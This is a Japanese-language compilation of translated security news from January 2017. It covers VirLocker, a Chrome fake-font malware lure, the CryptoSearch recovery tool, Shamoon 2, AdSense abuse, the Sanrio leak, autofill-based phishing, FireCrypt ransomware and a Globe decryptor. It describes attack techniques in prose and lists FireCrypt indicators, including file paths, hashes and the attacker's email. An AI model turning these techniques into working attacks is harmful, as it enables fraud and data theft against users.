     この身代金要求型マルウェアは、最初のバージョンの後、決していなくなっていたわけではなく、TorrentLocker、CryptoLocker、TeslaCryptや、より最近のCerber、Lockyを押し付けてくるような巨大なスパムキャンペーンの中心に決して存在せず、控えめにしていただけである。新しいバージョン(2016年のものや、今週Malwarebytesが発見したもの)は現れ続けていた。

    或るコードでVirLockerは削除できる

     長期に渡りBleeping Computerのフォーラムで活躍しているユーザであり、Malwarebytesのセキュリティ研究者Nathan Scottによると、この最近のバージョンは、特定の復号プログラムなしに打ち負かすことができる、としている。
     このトリックは、"Transfer ID"セクション中のVirLocker脅迫文中に64個の 0 を入力することだと、Scottは発言している。

    0000000000000000000000000000000000000000000000000000000000000000

     このコードは、この身代金要求型マルウェアを欺き、犠牲者が身代金を支払ったと思い込ませる。しかし、ユーザの作業は未だ終了していない。まだ始まったばかりである。

    VirLockerは、全てのファイルを暗号化し実行ファイルの内部に格納する

     VirLockerの感染プロセスは、2014年当時と殆どの部分で同じである。犠牲者のファイルを奪い、これをEXE Shell内部に包み込む。これは、全てのファイルが暗号化され、次に実行ファイルとして詰め直されることを意味している。
     例えば、photo.pngという名前の画像ファイルは、photo.png.exeになる。殆どのWindowsインストレーションは、最後のファイル拡張子を非表示にするので、ユーザは、photo.pngを見るだけで、このファイルがバイナリであることを認識しない。
     しかし、以前より更に悪くなっているのは、これらのEXEファイルの一つ一つがVirLocker身代金要求型マルウェアのコピーを含むことにある。これは、一部の犠牲者が、彼等の友人に悪意あるファイルを拡散する可能性があることを、あるいは、認識することなく、VirLockerのコピーをバックアップすることを意味している。VirLockerが実際にEXEファイルを作成し、インチキの .exe 拡張子を追加しないという事実は、VirLockerを大変危険なものにしている(簡単に拡散することが可能)。

    あなたの全ファイルを復号するには時間がかかるだろう

    Scottは、64個の 0 を入力した犠牲者は、直ちに彼等の全ての重要なファイル(確保しておきたいファイル)を開き始めなければならない、と発言している。
     犠牲者は、重要なファイルを暗号化し格納している、そのEXEファイルをダブルクリックしなければならない。このEXEファイル(埋め込まれているVirLockerの変種)は、身代金が支払われたと理解し、このEXEファイルの内部からオリジナルのファイルを解凍し復号し、ディスク上にコピーを作成する。
     例えば、photo.png.exeをダブルクリックすると、photo.pngと呼ばれる二つ目のファイルが作成される。これはオリジナルのファイルである。この汚染されているEXEファイルは、ディスク上のオリジナル ファイルの傍らに残っていることに注意しなさい。
     自動化された復号プロセスは存在しない。犠牲者は、ハードドライブを捜索し手動でファイルを解凍する必要がある。

    犠牲者はオリジナルのファイルを取り戻したら、ハードドライブからファイルを完全に消し去る必要がある

     犠牲者が、この操作を終了したら、犠牲者は、生きているVirLocker身代金要求型マルウェアを含む如何なるEXEバージョンもコピーしないように細心の注意を払って、彼等のオリジナル ファイルの全てをバックアップ ドライブに移動しなさい。危険なEXEロック ファイルを一つでもコピーすることは、新しいホストにVirLocker感染を拡散することになるか、後で、そのPCを再感染させるかの何れかになる。
     データをバックアップしたら、ディスク上に危険なファイルを残したままにしておくと、再感染の高い危険性があるので、犠牲者は、そのコンピュータを完全にクリーンにし、オペレーティングシステムを再インストールしなさい。
     「あなたは、感染したマシン上に存在するファイルは一つとして、もはや信頼できない」と、Scottはブログに記述すると共に、最新のVirLockerの動作方法を詳細に説明している。以下が、VirLocker脅迫画面のスクリーンショットである。


    Chromeのユーザは、新たな"Font Wasn't Found"(フォントが見つかりません)テクニックでマルウェアの標的にされていた
    BleepingComputer : News>Security (2017/01/18)


    Google Chromeでのポップアップ。疑わしいフォント アップグレードパッケージをダウンロードするように要請している

     Google Chromeのユーザは、彼等のブラウザのフォント アップグレードパッケージ(まず間違いなく、マルウェアが混入されている)をダウンロードするように、彼等を欺こうとするWebサイトに警戒する必要がある。
     この感染テクニックは、Proofpointの研究者によって発見された。彼等は、Windows上のChromeユーザだけ、特定の国の人々だけ、そして、彼等が検索エンジン結果のような、特定のルートを使用してセキュリティ侵害されたWebサイトに移動してきた場合にだけ標的にされると発言している。

    攻撃者はHTMLタグを置き換え、Webページを破壊している

     このテクニックは、攻撃者がWebサイトをセキュリティ侵害し、そのサイトのソースコードに独自のスクリプトを追加することに依存している。
     これらのスクリプトは、入力トラフィックを除去し、Windows上のChromeユーザにだけ別の悪意あるスクリプトをロードする。
     この二つ目のスクリプトは、HTMLタグを"& # o,"で置き換え、そのサイトのコンテンツを破壊し、ページ全体を�文字で表示する。
     この文字列は、Webサイトやフォントと文字列のレンダリング問題があるソフトウェ中で、しばしば遭遇する。そこで、犯罪者は、指定のフォントが彼等のデバイス上に見つからないので、ユーザはフォント パッケージアップデートをダウンロードしインストールする必要があると、ユーザに告げるポップアップを表示する。
     このポップアップを正当なものと見せかけるために、このポップアップは、Google Chromeのロゴを記載し、公式のGoogle Chrome Webサイトに観られるようなクラシックなボタン形式を使用している。感染経路全体を示すGIFは以下で利用可能である。


    ChromeユーザをターゲットにしているEITest感染経路

     Proofpointによると、このテクニックは、EITest感染経路の一部として、通常ハックされたサイトで発見される。EITestは、pseudo-Darkleech(擬似Darkleech(【訳注】 何千というApacheサーバに感染する、2012年に始まった攻撃の名前))と類似のマルウェア感染経路に与えられたニックネームである。
     EITestの背後にいるグループは、既知の脆弱性を使用して、多大な数のWebサイト(通常はWordPressやJoomla)をセキュリティ侵害する作業をしている。
     彼等は、これらのサイトから少量のトラフィックを盗み、そのトラフィックを悪意あるペイロードにリダイレクトするように挙動している。
     このEITest作戦は、2014年に現れ、時間を通じて、最終ペイロードは大きく変化した。EITestグループは、複数の他のサイバー犯罪活動へ彼等のトラフィックソースを貸し出していると仄めかしている。
     その存続期間の大部分に関して、EITestグループは、脆弱性悪用キットのオペレータ(ユーザが何ら間違いに気がつくことなく、ユーザのデバイスに自動的にマルウェアをインストールするためにFlash, Silverlight, IEや他の脆弱性を使用している者共)にトラフィックを貸し出していた。

    Chromeユーザは、Fleercivetクリック詐欺マルウェアに感染させられる

     これら最近のChromeユーザへの"font wasn't found"攻撃は、彼等がダウンロードボタンをユーザがクリックすることに依存しているために、同じハイレベルでの感染の成功を保証している他の脆弱性悪用キットとは異なっている。
     Proofpointは、このテクニックを介してユーザがダウンロードしたフォント アップデートパッケージは、Fleercivetクリック詐欺マルウェアに感染させられている。このマルウェアは、予め設定されているURLに移動させ、金銭を得るためにユーザには見えないように置かれている広告をクリックさせるように動作する。
     この同じマルウェアは、2015年の初めにはSimbyで、2015年後半と2016年はClicoolの名前で地下の犯罪サービスで広告されていた。

    CryptoSearch: 身代金要求型マルウェアによって暗号化されたファイルを発見し、新しい場所に移動するツール
    BleepingComputer : News>Security (2017/01/15)


     セキュリティ研究者Michael Gillespieが、身代金要求型マルウェアに感染した犠牲者を支援するための新しいWindowsアプリケーションを開発した。
     CryptoSearchろ名付けられたこのツールは、幾つかのタイプの身代金要求型マルウェアファミリーによって暗号化されたファイルを同定し、ロックされたファイルを復元する復号プログラムが将来リリースされることを期待して、ファイルのコピーと新しい場所に移動するオプションとをユーザに提供するものである。  Gillespieは、復号できない身代金要求型マルウェアによって感染させられたコンピュータの回復兼クリーニング ユーティリティとして、このアプリケーションを開発した。
     何れにせよ、PCの所有者がロックされたファイルを復元するのは不可能なので、最善の方策は、暗号化された全てのデータをバックアップドライブに移動し、セキュリティ研究者が、その身代金要求型マルウェアの暗号化を解く方法発見するまで待つことである。
     全ての暗号化されたファイルを集めるということとは、話を異にする。身代金要求型マルウェアは、フォルダではなく、或るタイプのファイルを暗号化することを仕事にしているので、犠牲者は通常、暗号化されたファイルを、幾つかの中央集権的な場所ではなく、彼等のPC全体に分散して持っている。
     ここでCryptoSearchが役に立つ。このツールは、この検索プロセスと、これらのファイルを新しい場所に移動することを自動化している。この操作が終了し、PCの所有者が暗号化されたデータのバックアップを持ったなら、身代金要求型マルウェアによって暗号化されたファイルを削除することによって、コンピュータをクリーンアップしたり、敢えて、ハードドライブ全体を消去し、OS全体を再インストールすることができる。

    CryptoSearchは、ID Ransomewareと共同して作業する

     内容を具体的に見ると、CryptoSearchは、ID Ransomewareサービスと提携して作業している、これは、あなたがこのアプリケーションを実行している時、オンラインにいる必要がある。(【UPDATE】 この記事が公開された後、程なくして、Offline Modeのサポートが追加された)
     Gillespieによると、CryptoSearchは、ユーザのPCをロックした身代金要求型マルウェアのタイプを同定するために必要なデータを取得するために、ID Ransomewareをクエリーする。



     「このプログラムは、私が提供するID Ransomewareによって稼働されている、そこで、最新の判明した身代金要求型マルウェアとそのシグネチャーで、常に定義ファイルがアップデートされる」と、Gillespieは、本日、彼が公式にこのアプリケーションを起動した場所であるBleeping Computerフォーラムに記述しいている。
     「CryptoSearchを最初に起動すると、このアプリケーションは、そのWebサイトにコンタクトし、既存の拡張子とバイト パターンに関する最新情報をダウンロードする」とし、更に、「既知のファイルパターンや拡張子によってファイル(一部の変種に関しては、暗号化されたファイル中の16進数パターン)を同定する。」
     CryptoSearchは、ローカルファイルの検索に、このデータベースを使用し、身代金要求型マルウェアの感染を同定し、次に、その身代金要求型マルウェアによってロックされた全てのファイルを発見する。


     CryptoSearchが、全てのファイルを特定すると、ユーザは、メニューでプロンプトされ、ファイルを移動しコピーしたいのか否か尋ねられ、次に、暗号化されたデータを何処に保管するのか尋ねられる。
     Gillespieは、CryptoSearchは、本来のフォルダ構造を維持してファイルを転送する高性能な方法であると発言している。例えば、C:\Test\Folder で発見されたファイルは、J:\Backup\C\Test\Folder に移動されるだろう。



     CryptoSearchは現在、ベータ開発ステージである、これは将来より多くの機能が追加されることを意味している。
     現在要求されている機能の一つは、ID Ransomewareデータベースの静的なコピーを含む「オフラインモード」である(【訳注】 上述のUpdateでも述べたように、この機能は既に追加されています)。これで、CryptoSearchは、インターネット接続なしに使用することができるようになる。
     それらをオフラインで入手することによって、コンピュータを隔絶することは、身代金要求型マルウェア感染の場合の標準的技法なので、ユーザは、この機能を求めていた。この機能に関するスケジュールが存在していないので、あなたは、GillespieのTwitterやBleeping Computerのフォーラム トピックに目を光らせておく必要がある。CryptoSearchは、コチラからダウンロードできる。


    気をつけろ! 死から復活した非常なマルウェアは、今、仮想マシン・キラーである
    Fossbytes : Security (2017/01/11)


     概要: Palo Alto Networksのセキュリティ研究者は、2011年にSaudi Aramco(【訳注】 サウジ・アラムコ、サウジアラビア国営の石油会社)の35000のマシンを攻撃したShamoon類似のマルウェアの二つのバージョンを発見した。Second Shamoon 2として知られる、この最新のバージョンは、2016年11月に発見された。これは、サイバースパイ活動を引き起こし、標的のネットワーク上で動作している仮想マシンにダメージを与えることが知られている。

     サイバースパイ活動として知られる悪名高きShamoon(別名 Disttrack)マルエウェアが復活した。そして、以前より進歩し、仮想マシンを削除する能力を加えている。
     Shamoonは、ローカルネットワーク上で拡散する能力を持っている。このマルウェアは、コンピュータの特定の場所からファイルの一覧を収集し、そのファイルを削除する前に攻撃者に、それを送信する。このマルウェアは、マシンをアクセス不能にするためにMBR(マスター・ブート・レコード)を上書きする。


    MBRを変更され、OSを発見できなくなっているシステム

     Shamoonは、サウジアラビアを本拠とするSaudi Aramco石油会社を攻撃するために使用され、35000のマシンに影響を与えた2012年が初出のようである。これらのマシンをオンラインに復帰させるために、凡そ一週間を要した。'Shamoon 2' と名付けられた、このShamoonマルウェアの新たなインスタンスに光が当てられたのは2016年11月である。このマルウェアは、サウジアラビアを本拠とする他の企業を攻撃するために使用され、2016年11月17日に、システムを削除するように設定されていた。
     'Second Shamoon 2' と呼ばれる類似のペイロードは、Palo Alto Networksのセキュリティ研究者によって11月に再び発見された。そして、これもまたサウジアラビアをターゲットにしていた。この研究者は、Second Shamoon 2が、犠牲者の組織に関連したハードコードされたアカウント認証を含んでいることに気がついた。この挙動は、先行したShamoon 2では観られていない。
     これらのユーザ証明書が、Windowsのパスワード複雑性の要求を満たしているという事実は、最新の攻撃のためにユーザ名とパスワードを収穫するために使用された11月17日に類似した未知の攻撃を、この研究者に、想起させている。
     また、公式のドキュメントの一部として、このアップデートされたShamoonは、Huawei(【訳注】 ファーウェイ、中国・広東省深センに本社を置く通信機器メーカー(Wikipediaより))デスクトップ仮想化製品(仮想デスクトップ・インフラストラクチャを作成するために使用されるFusionCloudのような)用の管理者アカウントユーザ証明書を含んでいる。これらの仮想システムは、仮想デスクトップ・インターフェース・スナップショット(このマシンの内容が削除される前に作成されるバックアップ)を簡単にすることによって、Shamoonのようなマルウェアに対する保護を提供するものとして知られている。
     ターゲットになっている組織が、彼等のHuawei VDIシステムをセットアップするために、この証明書を使用している可能性がある。この攻撃者達は、この仮想マシンの保護を無効にすることで攻撃強度を増加しようとしてそれらを含めたのだろう。攻撃者達が、証明書を取得するために以前の攻撃を起動したのか否か、あるいはパスワードを推測するために当てずっぽうに矢を補ったものなのか定かではない。
     更に、この研究者達は、サウジアラビア現地時間11月29日午前1時30分にシステムを削除するようにスケジュールされ、マルウェアを拡散するために使用される媒体に気が付いていない。その時点で、職員が、その組織に存在しているはずがないので、検出とあらゆる対策の開始に時間がかかることになった。
     Second Shamoon 2に関する詳細を知りたいのなら、オリジナルのブログ ポストを読みなさい。


    二つの攻撃的キャンペーンに、疑うことを知らないユーザをフィッシングしようとするGoogle Adsが検出された
    BleepingComputer : News>Security (2017/01/11)
     此処数週間に渡り、SucuriとMalwarebytesのセキュリティ研究者は、犯罪者に利益をもたらすために、Google Adsを押し付け、ユーザを欺いてクリックさせる、ハッキングされたWebサイトやインチキのWebサイトを乱用している二つのキャンペーンを発見した。
     無関係と思われるこの二つのキャンペーンで、犯罪者はAdSense(Webサイトの所有者が、彼等のサイト上に広告を挿入することを可能にするGoogleのサービス)を悪用している。

    過度に攻撃的な広告を挿入するためにサイトをハッキングする

     一つ目のキャンペーンは、Sucuri(Webセキュリティに特化された企業)のセキュリティ研究者によって検出された。
     この企業の専門家は、ハッキングされ、コンテンツのトップに巨大な広告パネルを表示された一連のWebサイトを調査するために招集されている。


    過度に攻撃的なGoogle AdSense広告

     これらのサイトの所有者は、この広告パネルが表示される方法を発見するための難しい時期を持った。Sucuriによると、攻撃者はサイトをセキュリティ侵害し、Webサイトのソースコード内に手動でJavaScriptコードを挿入するか、自動的にJavaScriptコードをロードするために、コアCMSファイルを変更した。
     これらの攻撃は或る特定のプラットフォームを標的にしているわけではなく、攻撃者は、 WordPress, Joomla, Magentoを実行しているサイト、並びにstatic HTMLのサイトでさえセキュリティ侵害していた。
     或る場合には、攻撃者は、ソースファイルを編集するのではなく、ウィジェットを使用して悪意あるコードを、そのサイトに追加することで、WordPress管理者アカウントをセキュリティ侵害していたかのようである。
     Sucuriによると、この巨大な広告は、セキュリティ侵害されたサイトのモバイルとデスクトップの両バージョンで表示されている。
    更に、彼等の広告を表示するためにハッカーによって使用された攻撃的テクニックのために、Googleが誰かにペナルティを科そうとした場合には、皮肉にも、公式なAdSenseのポリシー("every publisher is responsible for the content of a site on which their ad code is placed,"。Google日本語サイトでの和訳は、「なお、広告コードを配置したサイトのコンテンツについては、各サイト運営者様の責任となりますのでご注意ください。」)により、正当なサイトの所有者に科されることになる。
     このポリシーは続けて、"If a site is found in violation of our policies, we will notify any publisher(s) whose ad code is on the site," (Google日本語サイトでの和訳は、「サイトが AdSense のポリシーに違反していることが発覚した場合、Google は、そのサイトに広告コードを配置しているすべてのサイト運営者様に通知いたします。」)としている。これらのハッキングを発見したSucuriの専門家Denis Sinegubkoによると、「攻撃者のIDは、サードパーティのサーバから自動的にロードされているので、あなたが、そのサイトを調査すれば、各サイト運営者の正当なIDは簡単に発見することができる」としている。

    クリックベイト ブログはアダルトポータルを装い、ユーザのクリックを収穫している

    【訳注】 クリックベイト(Clickbait): わざと扇情的な見出しや刺激的なサムネイル画像をつけてネットユーザーのクリックを誘うウェブページやリンクや動画や広告などのこと(英語ネットスラング辞典より)

     AdSense広告を攻撃的に押し付けてくる二つ目のキャンペーンは、Malwarebytesによって発見された、そして、このキャンペーンはハッキングされたWebサイトに関係していなかった。
     このキャンペーンはShady(正当なサイトのコンテンツをスクラップすることによって作成されている)ブログに関連している。犯罪者は、Googleや他の検索エンジンを欺き、これらのWebサイトを上位に表示する様々なブラックハットSEO(【訳注】 悪質な手法を駆使して検索結果を上位に表示するテクニック(IT用語辞典BINARYより))テクニックを使用して、このサイトにWebトラフィックを突っ込ませている。
     トラフィック フィルタリングシステムを介して、犯罪者は検索エンジンボットと実際のユーザを、そして、そのサイトにリダイレクトで来たユーザと手動でURLをタイプしてやって来たユーザ(セキュリティ研究者)とを識別している。
     ボットと、そのブログのURLを手動入力したユーザは、本来の状態でそのブログを見ることになるが、リダイレクトでこのサイトに到達したユーザは、その本来のブログはインチキのアダルト ポータルを表示するオーバーレイによって隠されることになる。
     このアダルト・ムービーを再生しようとして、そのサイト上のビデオの一つをロードしているユーザは、意識することなく、このサイトの所有者によって非表示にされている隠された広告をクリックすることになる。


    ユーザを欺き非表示の広告をクリックさせようとしているインチキのアダルト・ポータル

     基本的に、そもそもアダルトサイトを訪問したくないユーザは、ビデオ以外のところで遊ぼうとするが、実際には非表示の広告をクリックしている。
     そして、広告会社は、多くの人々がAdBlockerをインストールしていることを不思議に思っているだろう。


    盗まれていたHello Kittyファン330万のデータがオンラインに公開された
    Sophos : Hot for Security (2017/01/11)
     2015年12月、セキュリティ研究者Chris Vickeryは、親会社Sanrioの不注意により、数百万のHello Kittyファンがリスクの下にあることを明らかにした。これはSanrioが、公にアクセス可能なMongoDB上に重要なアカウントの詳細を放置したままにしたことにあった。
     幸いなことに、金融関連データはリスクに晒されてはいないようである。
     しかし、晒された情報には、sanrio.comユーザの名前、彼等の誕生日、性別、出生国、eMailアドレス、ソルト(【訳注】 ソルトは、復号を困難にするために暗号化の間にランダムな文字列を追加する方法)されていなパスワード ハッシュ、パスワードのヒントと答え等を含んでいた。
    通常の事態でも十分酷いものであるが、あなたが世界中のHello Kittyの数百万の若いファンに思いを馳せた時、特に身を凍らせることになる。
    しかしながら、Sanrioは、そのユーザデータベースの設定を安全に確保していたので、如何なるデータも盗まれていはいないと確信すると関係者に断言していた。

     「更に、新しいセキュリティ基準が、このサーバに適用される。そして、我々は、この事件の内部調査とセキュリティ検証を実施する。会社の現在の認識としては、盗まれたり、晒されたりしているデータはない。」

     一年前に戻ってみると、我々は、あまりに楽観的であったかのようである。
     この週末、CSO Onlineのレポートとして、3,345,168ユーザのデータベースがオンラインに晒された。これは、結局、十分に安全が確保されていないデータを入手していた者が「実行」したことを示している。
     このレコードの186000を超えるものが、18歳未満である。
     Sanrioが2015年にデータが盗まれた証拠はないとした事実は、万事順調であるとする証明にはなっていなかった。
     それで、どう対処すればいいのか? 2015年に戻る。Sanrioはユーザにパスワードを変更するようにアドバイスしたが、いったい、どれだけの人が、このアドバイスを聞き、行動したのか疑わざるを得ない。
     もちろん、SanrioのWebサイトで使用されているあなたと子供のパスワードが、他の如何なるWebサイトでも使用されていないということは極めて重要である。パスワードは、それらが難解であり、且つ一意である場合を除き、安全とは考えることはできない。
     これが、私が多くの人々にパスワードマネージャ(あなたに代わってパスワードを思い出してくれて安全にパスワードを格納してくれるだけでなく、新しいオンラインアカウントを作成する度に、本当に、ランダムで複雑なパスワードを生成してくれるソフトウェア)を推奨する理由である。
     他方、Sanrioのような会社は、彼等のオンラインデータベースを適切に確保しておく重要性に目覚める必要がある。我々は現在、MongoDBデータベースの大変多くの誤った設定のために、多くの組織が、認証されていないユーザに、そのデータベースを開き放なしのままにされていることを学習している。


    ブラウザの自動補完機能が、新しいフィッシング攻撃で個人情報を盗むために使用されていた
    The Guardian : Technology (2017/01/10)
     あなたのブラウザやパスワードマネージャの自動補完機能は、サイト上で非表示にしたテキストボックスを使用している無節操なフィッシング詐欺師に、あなたの情報を気づかずに与えているかもしれない。
     フィンランド人のWeb開発者兼ハッカーViljami Kuosmanenは、Google Chrome, Apple Safari, Operaを含む幾つかのWebブラウザ、並びに幾つかのプラグインやLastPassのようなユーティリティを欺いて、プロファイルに基づいた自動補完システムを介してユーザの個人情報を与えることができることを発見した
     このフィッシング攻撃は、驚くほど単純である。ユーザが、幾つかの単純なテキストボックスに情報(名前やeMailアドレスのような)を書き込もうとするとき、自動補完システム(アドレスのような標準的な情報の飽き飽きする繰り返しを回避することを目的とする)は、他のプロファイルに基づいた情報を任意の他のテキストボックスに挿入しようとする(これらのボックスがページ上で非表示になっている場合でさえ)ことを、Kuosmanenは発見した。
     これは、ユーザが一見した所危険がないと思われる基本情報をサイトに入力すると、この自動補完システムは、同時に、ユーザが確認すべきより重要な情報を与えことになることを意味している。Chromeの自動補完システム(DefaultでONになっている)は、eMailアドレス、電話番号、メーリングアドレス、組織、クレジットカード情報、その他様々な細々とした情報を格納している。

    Viljami KuosmanenのTwiiter(デモンストレーション付き)

     Kuosmanenは、ユーザ名とeMailアドレス用のテキストボックスを表示し、Chromeによって自動補完される非表示の住所と電話番号用のテキストボックスの付いたサイトを立ち上げ、この問題をデモンストレーションしている。
     Mozilla Firefoxは、マルチボックス自動補完システムを未だ搭載していないので、この問題の影響は受けないし、プログラム的な手法でテキストボックスを満たすように欺かれることはないと、Mozillaの主幹セキュリティエンジニアDaniel Veditzは、発言している。しかしながら、より完成された自動補完システムが、Firefox用に現在開発されている。
     このフィッシング攻撃は依然として、少なくとも幾つかの情報をオンラインのフォームに入力するように欺かれたユーザに依存しているが、疑うことを知らないユーザは、彼等が予期しているより比較的簡単に入力するように欺かれるだろう。
     ユーザは、彼等のブラウザや拡張の設定で、この自動補完システムを無効化することによって、この種のフィッシング攻撃から自分自身を保護することができる。


    FireCrypt身代金要求型マルウェアがDDoSコンポーネントを搭載
    BleepingComputer : News>Security (2017/01/04)
     FireCryptという身代金要求型マルウェア ファミリーは、ユーザのファイルを暗号化し、ソースコード中にハードコードされているURLに関する大変貧弱なDDoS攻撃を起動しようとしている。
     この脅威は本日、MalwareHunterTeamによって発見された。以下は、MalwareHunterTeamとBleepingComputerのLawrence Abramsによって提供された、この身代金要求型マルウェアの動作モードの解析である。

    FireCryptは、身代金要求型マルウェア構築キットを感じさせる

     マルウェアは通常ソースコードからコンパイルすることで、あるいは、特定のインプット パラメータを取り、作戦ベースでカスタマイズされたマルウェア ペイロードを出力する自動化ソフトウェアを使用して生成される。
     後者は、この業界ではマルウェア ビルダーとして知られており、通常コマンドライン アプリケーションもしくはGUIベースのツールとして提供される。
     FireCrypt身代金要求型マルウェアの製作者は、FireCryptのサンプルを組み立てるプロセスを自動化するコマンドライン アプリケーションを使用している。これは、ソースコードをコンパイルする巨大なIDE(統合開発環境)を操作する必要なしに、彼が基本設定を編集することを可能にするためである。
     FireCryptのビルダは、BleedGleen(下図参照)と名付けられており、このFireCryptの製作者が一意の身代金要求型マルウェア実行ファイルを生成し、それに任意の名前を与え、個別のファイルアイコンを与えることを可能にする。他の身代金要求型マルウェア ビルダと比較すると、これは大変ローエンドなアプリケーションである。類似のビルダは通常、犯罪者が広汎なオプションのセット(支払いを受け取るBitcoinアドレス、身代金要求額、コンタクト用のeMailアドレス等)をカスタマイズすることが可能である。




     このビルダの役割は、EXEファイルをPDFやDOCアイコンで偽装する他に、新しいコンパイル毎に異なるハッシュでファイルを生成するために、この身代金要求型マルウェアのバイナリを僅かに変更することでもある。このテクニックは、標準的なアンチウィルスで検出されることを難しくする「ポリモーフィック マルウェア」と呼ばれるものを作成するために、マルウェア開発者によってしばしば使用される。MalwareHunterTeamによると、「このビルダは大変基本的なので、実際のアンチウィルスに対抗する助けにはならない。
     そう言っても、これは、FireCryptの製作者が少なくともマルウェアの開発において、ある種の経験を持っていることを、GitHubからオープンソースの身代金要求型マルウェアをダウンロードする、よくあるスクリプトキディ(【訳注】 ウェブで入手できるクラッキング・ツールだけを使う、スキルのないクラッカ(コンピュータ用語辞典より))ではないことを我々に告げている。

    FireCrypt感染プロセス

    FireCryptの感染プロセスは、この身代金要求型マルウェアの配布者が生成したEXEファイルを起動する際にユーザを欺くための能力で決まる。
     これを根拠として、FireCryptは、そのコンピュータのTask Manager(taskmgr.exe)を停止し、20のファイルタイプのリストに基づいて暗号化を開始する。FireCryptは、AES-256暗号化アルゴリズムでファイルを暗号化する。
     全ての暗号化されたファイルは、オリジナルのファイル名の拡張子に".firecrypt"拡張子が追加される。例えば、photo.pngと名付けられているファイルは、photo.png.firecrypt にリネームされる。


     ファイルの暗号化が終了すると、FireCryptは、そのユーザのデスクトップに脅迫文を投下する。


    FireCryptの脅迫文

     この脅迫文は、同じMalwareHunterTeamによって昨年の10月14日に発見されたDeadly for a Good Purpose身代金要求型マルウェアの脅迫文と殆ど同一のコピーである。


    Deadly for a Good Purpose身代金要求型マルウェアの脅迫文(画像をクリックすると拡大します)

     2016年10月に発見された時点では、Deadly for a Good Purpose身代金要求型マルウェアは開発段階であり、そのソースコードは、犠牲者のコンピュータの日付が2017年の日付になる、もしくは、それ以降にだけファイル暗号化プロセスを始めるようになっていた。
     FireCryptと比較すると、唯一の相違点はDeadly for a Good Purposeが脅迫文のトップにロゴを示していることである(現在FireCryptにはロゴはない)。しかし、Deadlyのソースコードの詳細な検証で、MalwareHunterTeamは、この二つの身代金要求型マルウェアのバージョンが、同一のeMailアドレスとBitcoinアドレスを使用していることを発見した(この二つの間に明らかな関連性を示している)。FireCryptは、オリジナルのDeadly for a Good Purpose身代金要求型マルウェアのリブランドである。


    画像をクリックすると拡大します

    ハードドライブをジャンクファイルで満たすDDoS機能

     脅迫文を投下した後も、FireCryptは悪意ある挙動を停止しない。このソースコードは、途切れることなくURLに接続し、そのコンテンツをダウンロードし、それを%Temp%フォルダの[random_chars]-[connect_number].htmlと名付けられたファイルに保存する。
     ユーザがこの機能に気が付かない場合、FireCryptは、素早く%Temp%フォルダをジャンクファイルで充満するだろう。
     FireCrypt身代金要求型マルウェアの現在のバージョンは、http://www.pta.gov.pk/index.php のコンテンツをダウンロードする。このURLは、Pakistan's Telecommunication Authority(パキスタン通信省)の公式ポータルである。このURLは、身代金要求型マルウェアのビルダを使用して改竄することはできない。


    FireCryptのDDoS機能

     FireCryptの製作者は、この機能を"DDoSer"と呼んでいるが、これは無理だろう。この犯罪者は数千の犠牲者に感染した後、十分な大きさのDDoS攻撃を仕掛け、当局のWebサイトに何らかの問題を引き起こすことができる。
     更に、全て犠牲者は同時に感染させられており、DDoS攻撃に参加するためには、彼等のコンピュータがインターネットに接続されていなければならない。
     記述している時点で、FireCryptで暗号化されたファイルを復元する方法は知られていない。この脅威の感染者で 500 USD(約58000円)の身代金を支払うことができない、もしくは支払う意思がない犠牲者は、将来復号プログラムがリリースされる可能性があるので、暗号化されたファイルの全てのコピーを保持しておきなさい。

    標的とされているファイル拡張子

    .txt, .jpg, .png, .doc, .docx, .csv, .sql, .mdb, .sln, .php, .asp, .aspx, .html,
    .htm, .csx, .psd, .aep, .mp3, .pdf, .torrent

    FireCrypt身代金要求型マルウェア関連ファイル

    %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\[random_chars].exe - Startup Executable
    %Desktop%\[random_chars]-READ_ME.html - Ransom Note
    %AppData%\SysWin32\files.txt - List of Encrypted Files
    %Desktop%\random_chars]-filesencrypted.html - List of Encrypted Files
    %Temp%\random_chars]-[connect_number].html - Files downloaded during the DDoS attack

    FireCrypt身代金要求型マルウェア関連ハッシュ

     BleedGreenビルダ(VirusTotalのスキャンは、現在 2/57 を検出している)
    SHA-256: e77df2ce34949eb11290445a411a47fb927e8871e2580897581981d17730032d
     FireCrypt身代金要求型マルウェアのバイナリ サンプル(VirusTotalのスキャンは、現在 13/57 を検出している)
    SHA-256:757e3242f6a2685ed9957c9e66235af889a7accead5719514719106d0b3c6fb4

    eMailアドレスと支払い用連絡先

    EMAIL: gravityz3r0@sigaint.org

    Emsisoftが、Globe身代金要求型マルウェア バージョン3用の復号プログラムをリリースした
    BleepingComputer : News>Security (2017/01/04)
     また再び、EmsisoftFabian Wosarが救出に現れ、Globe身代金要求型マルウェア v.3用の復号プログラムをリリースした。この復号プログラムは、暗号化されたファイルに .decrypt2017 と .hnumkhotep 拡張子を一般的に追加するGlobe身代金要求型マルウェアの変種を復号する。この身代金要求型マルウェアはまた、下の画像に類似した脅迫文を表示する。
     この復号プログラムを使用するには、暗号化されたファイルと、同じファイルで暗号化されていないものの二つを必要とする。この二つのファイルを使用して、この復号プログラムは復号鍵を決定し、あなたのファイルを修復する。この復号プログラムの使用する方法の説明は後述する。


    Globeの脅迫文

    Globe身代金要求型マルウェア v.3 を復号するには

     あなたが、この身代金要求型マルウェアに感染したのなら、単純に、下のリンクから decrypt_Globe3.exe をダウンロードし、それをデスクトップに保存しなさい。

    Decrypt Globe3ダウンロード

     復号鍵を発見するには、同じファイルの暗号化されたファイルと暗号化されていないファイルの両方を同時に decrypt_Globe3.exe アイコン上にドラッグする必要がある。あなたが一つのファイルの暗号化されたバージョンと暗号化されていないバージョンの両方を選択したら、その両方を、この実行ファイル上にドラッグしなさい。この復号プログラムを使用するためのファイルを見出そうとするなら、C:\Users\Public\Pictures\Sample Pictures フォルダ中に見出されるサンプル画像(【訳注】 あなたのピクチャ フォルダに存在しているサンプル画像。このファイルも暗号化されている場合は、同一のファイルを知人や会社からもらってきてください)を使用することができる。ファイルのサイズに着目し、暗号化されていないサンプル画像と、同じサイズの暗号化されているサンプル画像を選択する。
     このペアのファイルを暗号化するために使用された復号鍵が判明したら、この鍵は、あなたのコンピュータ上の暗号化された他の全てのファイルを復号するために使用することができる。
     私が同時に二つのファイルをドラッグするという意味を理解するには、以下に示すアニメーション画像を参照しなさい。この鍵を作成するために、私は暗号化されたPNGファイルと同じファイルの暗号化されていないバージョンと、decrypt_Globe3.exeプログラムを含むフォルダを作成した。ここで、通常のPNGファイルと、その暗号化されたバージョンの両方を同時に復号プログラムにドラッグした。


    この復号プログラムにファイルをドラッグする方法

